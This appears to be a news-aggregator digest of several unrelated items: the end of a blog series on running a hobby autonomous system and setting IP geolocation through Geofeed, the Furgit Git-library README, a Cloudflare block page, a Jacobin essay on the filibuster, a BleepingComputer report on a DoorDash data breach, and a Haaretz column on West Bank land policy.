That’s where Geofeed comes in — a standard allowing bulk geolocation submissions: https://docs.ipdata.co/docs/publishing-a-geofeed . Besides submitting your Geofeed via support ticket to Maxmind, you can also embed the Geofeed URL in the inet6num object in WHOIS, allowing databases to automatically crawl and update your IP locations. With this, you can get IPs from all sorts of bizarre countries, show off on probe dashboards and achieve “Light Up the Globe” status.

IP geolocation isn’t set-and-forget — databases may re-scan and revert your location. To reduce this risk, block ICMP (ping) and common ports via firewall to avoid scanning. Also, avoid using your server’s native IPv6 to browse the web — stick to WARP-assigned IPv4. Some providers (cough Google cough) may even use client-side (mobile) location to correct server IP geolocation. See this article for details.

Conclusion

Finally… This series began planning in June 2024, went through countless hurdles and waiting periods, and now wraps up just before December. If I waited any longer, my ASN and server would’ve expired (quietly).

We’ve explored setting up and maintaining an autonomous system on the Internet, configured BGP, peers, Anycast, and now IP geolocation spoofing — satisfying some bizarre curiosities, and gaining a new appreciation for ISPs and one-man IDCs (or not) .

I might try DN42 next, or maybe not. For now, this series ends here. See you in the next blog post~ o/

Furgit: fast implementation of Git in pure Go

Lobsters
github.com
2025-11-14 04:48:43
Comments...
Original Article

Furgit

builds.sr.ht status Go Reference

Furgit is a fast implementation of Git in pure Go, extracted from an internal package of Lindenii Villosa .

Furgit is in initial development, does not have tagged releases yet, and guarantees that the API will break every now and then. Do not use in production.

Furgit does not focus on command-line utilities; in particular, it does not intend to replace upstream git . It is intended to be used as a library.

Features

Currently, Furgit is very basic; it supports reading objects from loose objects and packfiles. There is some infrastructure for writing loose objects and packfiles in the tests but they need to be refactored.

Performance

Furgit is aggressively optimized for performance. As of November 2025 , for large repos such as Linux , it is:

Compatibility

  • We only aim to support UNIX-like operating systems that have syscall.Mmap .
  • Currently, this version of Furgit only supports SHA-1 hashes. However, the upstream Villosa project only uses SHA-256 hashes. You may edit two lines in hash.go to trivially switch to SHA-256.

Development

Etymology

I was thinking of names and I accidentally typed "git" as "fur" (i.e., left shifted one key on my QWERTY keyboard).

License

Currently, GNU Affero General Public License, version 3 only.

As an exception, pack_idx.go (responsible for .idx files which index packfiles) is public domain; I'd be happy to see a port of it to go-git , although achieving the same level of performance likely requires memory mapping.

Domain-specific Languages and Code Synthesis Using Haskell

Lobsters
queue.acm.org
2025-11-14 04:44:36
Comments...
Original Article

Why have I been blocked?

This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

What can I do to resolve this?

You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Democrats Caved In the Shutdown Because of the Filibuster

Portside
portside.org
2025-11-14 04:40:06
Democrats Caved In the Shutdown Because of the Filibuster jay Thu, 11/13/2025 - 23:40 ...
Original Article
Democrats Caved In the Shutdown Because of the Filibuster Published

The leadership of the Democratic Party wanted to preserve the filibuster for one reason: it checks anyone who defies party orthodoxy. | Photo: Daniel Heuer / Bloomberg // Jacobin

Why did the Democrats cave in on the shut down? It seems clear that the main issue was not electoral backlash, since most of the senators who caved are not up for reelection, and the politics were trending in the Democrats’ favor, or at least not against them.

The main issue was the filibuster. There was growing pressure from Donald Trump on the Republicans to get rid of it, and the Democratic leadership had every reason to fear its elimination. Why?

It has very little to do with preserving their power while they are in the minority; that ship has obviously sailed.

The Democratic leadership doesn’t want to get rid of the filibuster for the same reason the Republican leadership doesn’t want to get rid of it: The filibuster allows the leadership of both parties to keep their radical flanks at bay. Chuck Schumer needs the filibuster to protect himself from the Bernie Sanders wing in the Senate and the Alexandria Ocasio-Cortez (AOC) wing in the House: if you can’t get to sixty, Bernie and AOC, we have to follow the lead of Joe Manchin and Kyrsten Sinema. Same goes for John Thune to whoever inhabits the radical role at any given moment in the GOP.

You have to read the media coverage on this issue carefully. Usually, the blah blah blah of filibuster reportage is about the party worrying what happens when it is in the minority or individual senators worrying about losing their individual power. That’s the buzz of Broderism, a style of reporting that’s a holdover from the last century.

The real moment of truth comes in a nugget like this, from an article in the New York Times on November 4, which got lost amid the excitement about the Zohran Mamdani election:

In reality, the filibuster also serves Republicans as a handy check on a president who sometimes takes stances that carry substantial risk or defy party orthodoxy, an excuse for Senate Republicans to avoid doing things they don’t see as sound policy or politics without infuriating Mr. Trump.

For Trump, swap in Trump’s most rabid allies and foot soldiers in the Senate and the House — or Schumer’s and Hakeem Jeffries’s enemies in the Senate and the House — and you get a pretty clear sense of why the leaderships of both parties need the filibuster: It checks anyone who “defies party orthodoxy,” while providing “an excuse to avoid doing things.”

The Reactionary Mind: Conservatism from Edmund Burke to Donald Trump and a contributing editor at Jacobin.]

Jacobin ‘s fall issue, “Borders,” is out now. Follow this link to get a discounted subscription to our beautiful print quarterly.

DoorDash hit by new data breach in October exposing user information

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 04:38:44
DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly disclosed security incident. [...]...
Original Article

DoorDash

DoorDash has disclosed a data breach that hit the food delivery platform this October.

Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly disclosed security incident.

Your personal information affected

"On October 25, 2025, our team identified a cybersecurity incident that involved an unauthorized third party gaining access to and taking certain user contact information, which varied by individual," states the email notification from DoorDash.

Wiz

The information may have included:

  • First and last name
  • Physical address
  • Phone number
  • Email address

"Our investigation has since confirmed that your personal information was affected."

DoorDash email notifications disclosing security incident from October
DoorDash email notifications disclosing security incident from October
(BleepingComputer)

The incident has been traced to a DoorDash employee falling victim to a social engineering scam. Upon becoming aware, the company's incident response team shut down the unauthorized party's access, started an investigation, and referred the matter to law enforcement.

This marks the third notable security incident suffered by the delivery giant.

In 2019, a data breach at DoorDash had exposed the information of roughly 5 million customers , Dashers and merchants to an unauthorized party.

In August 2022, DoorDash suffered another data breach from the threat actors who had also attacked Twilio that year.

La traduction française suit

What's interesting is that a French translation of the notice is appended to these emails:

French translation of security incident disclosure
French translation of security incident disclosure (BleepingComputer)

At this time, it appears that the emails primarily went to DoorDash Canada users (including myself). We are yet to confirm if the breach also impacts users based in the US and other regions where DoorDash operates.

However, an undated security advisory posted on DoorDash's website includes wording that suggests the incident may extend beyond Canada, including references to US-specific data types, like Social Security Numbers (SSNs), which DoorDash says were not accessed. (Canadian counterpart would have been Social Insurance Numbers (SINs) )

BleepingComputer has approached the DoorDash press team with additional questions to seek clarification on the matter.

'Took 19 whole days'

Some users on social media have rebuked DoorDash, questioning the company's handling of the incident and the timing of the notifications.

"I'm sorry - if this isn't sensitive information, what is? Don't downplay this just because they didn't get credit card or password information. It's gone deaf," posted Chris from Toronto.

Cybersecurity professional Kostas T. also reacted to the email's phrasing, expressing that the statement "no sensitive information was accessed" conflicted with the personal information that the company acknowledged was accessed.

"DoorDash took 19 whole days to notify me of a data breach that has leaked my personal information. Thankfully I used a fake name and forwarded email address for my account, but my real phone number and physical address have been leaked," wrote X user itsohqay.

"This is incredibly unprofessional, dangerous, and potentially illegal behaviour from DoorDash... This process violates Canadian data breach law. I'll be filing a case against DoorDash in provincial small claims court and making a complaint to the Office of the Privacy Commissioner of Canada."

Users should be wary of unsolicited communications or targeted phishing emails appearing to originate from DoorDash.

DoorDash warns that you should avoid clicking on links or attachments within suspicious emails, and to refrain from providing any personal information to unfamiliar websites.

"We have already taken steps to respond to the incident, including deploying enhancements to our security systems, implementing additional training for our employees, bringing in a leading cybersecurity forensic firm to assist in our investigation of this issue, and notifying law enforcement for ongoing investigation," states the company.

DoorDash users with questions related to the incident can further call the toll-free number +1-833-918-8030  and cite reference code: B155060.

BleepingComputer awaits response from DoorDash on the exact scope of the incident.

Wiz

Secrets Security Cheat Sheet: From Sprawl to Control

Whether you're cleaning up old keys or setting guardrails for AI-generated code, this guide helps your team build securely from the start.

Get the cheat sheet and take the guesswork out of secrets management.

Under the Radar, Quiet and Persistent Population Transfer Is Underway in the West Bank

Portside
portside.org
2025-11-14 04:26:39
Under the Radar, Quiet and Persistent Population Transfer Is Underway in the West Bank jay Thu, 11/13/2025 - 23:26 ...
Original Article

Nabi Samwil, in September. The village lies in the Seam Zone: an immense area open to Israelis and closed to Palestinians. | Photo credit: Yahel Gazit / Haaretz

As the strike force of Yesha-stan (combining Yesha, the official acronym for Judea, Samaria and Gaza, with the state-like suffix -stan) devotedly carries out its missions in the West Bank, expelling as many Palestinians as possible from their lands, another, quieter expulsion is taking place away from the headlines.

Its violence is not carried out with iron bars or live ammunition, but with orders and regulations crafted by nameless, well-dressed legal experts, signed by army generals, and approved by Israel's High Court of Justice.

This population transfer is better known by the name Seam Zone : an immense area of about 320,000 dunams (nearly 124 square miles) lying between the separation barrier deep inside the West Bank, and the Green Line – open to Israelis and closed to Palestinians.

Israelis and tourists are free to move around there at will and to expand their suburban settlements , which are illegal under international law. For Palestinians living in the territory occupied by Israel in 1967, this mostly rural area is their natural lands reservoir, , now pushed beyond the proverbial mountains of darkness.

The minority among them - farmers from villages between Qalqilya and Ya'bad who had been granted entry permits, were banned from accessing their lands there for the past two years. After petitions by the Israeli human rights group HaMoked , a few farmers recently received permission for just two or three days of olive harvesting. They soon regretted going: their hearts broke at the sight of withered trees and long-neglected groves.

When the true experts on Israeli policy – the Palestinians, the left, and human rights organizations – warned in the early 2000s that the separation barrier's route was designed to seize more fertile land, state officials rolled their eyes and scoffed: "Us? Wanting as much land as possible with as few Palestinians as possible? Come on. Where did you get that idea? Security is our only concern."

Meanwhile, the Yesha-stan marauders set up pirate caravans and livestock pens just meters from Palestinian olive groves, then claim that the harvest poses a security threat. It is their God-given right, therefore, to attack harvesters until they bleed.

The state, for its part, condemns the population it occupied in 1967 to an eternal fate as rightless subjects, treating every water well, market, or organized tour in the artificially designated Area C as a punishable offense. In the Seam Zone – Area C squared – the restrictions are so draconian that the few thousand Palestinians who live in villages trapped inside it can reside in their own homes only if Israel deigns to issue them special permits.

Recently, the residents of three villages northwest of Jerusalem – Beit Iksa, Nabi Samwil and Khalaila – were added to this trapped population. For them, this is not a dramatic change hardly matters: they have long been completely cut off from their relatives, friends and workplaces. For 20 years they have faced severe restrictions on movement and construction. Once, a lively area connected these villages to each other and to their fields and orchards. Now, it has been "cleansed" of Palestinians and effectively annexed to Israel.

Today, however, residents of these three villages must also obtain Israeli permits simply to live in their own homes. Several hundred have not received such permits; several dozen have been told they never will. Israeli bureaucrats, dutifully following orders, will decide whose permits to revoke in the future, free to invent new "residential conditions" as needed.

This is a quiet, ongoing expulsion, and one that unfolds beneath the radar. It helps explain why most Israelis are not truly shocked by the bloody, unrestrained expulsions carried out by the "envoys of the Almighty," and why they are not filling the streets in protest to stop it. In the end, everyone supports a real-estate bonanza for Jews.

Amira Hass is a reporter and columnist for Ha’aretz Daily , a newspaper based in Tel Aviv, Israel. She has been a journalist for two decades.

Hass has written critically about both Israeli and Palestinian authorities. She has not allowed her gender, ethnicity or nationality – all hindrances in the region she reports from – to obstruct her from pursuing the truth in her reporting.

In 1989, Hass quit her studies in history at Tel Aviv University and began working as a copy editor for Ha’aretz Daily. At the same time, she volunteered for Workers Hotline, a human rights group dedicated to reaching out to vulnerable workers, many of whom were Palestinian. She became acquainted with life in Gaza and grew frustrated about how poorly Israel’s occupation of Gaza was represented in the Israeli press.

By 1991, Hass was writing weekly features for Ha’aretz Daily, and in 1993, she became a full-time writer for the paper. She moved to Gaza, which at the time was under direct and full Israeli occupation.

Hass, now based in Ramallah, has lived in the Occupied Palestinian territories for nearly 30 years. She has been reporting on the life of Palestinians under the Israeli occupation and covering the major armed clashes and Israeli military attacks. Her goal has been to provide her readers with detailed information about Israeli policies, especially restrictions on the freedom of movement.

In the course of her work, Hass has been threatened, harassed and detained. In May 2009, she was detained by Israeli police on her return from a four-month stay in Gaza “for violating a military order” (which forbids entry into Gaza) and “for staying illegally in an enemy state.” She had also been detained in December 2008 by Israeli police on her return to Ramallah for violating the same military order.]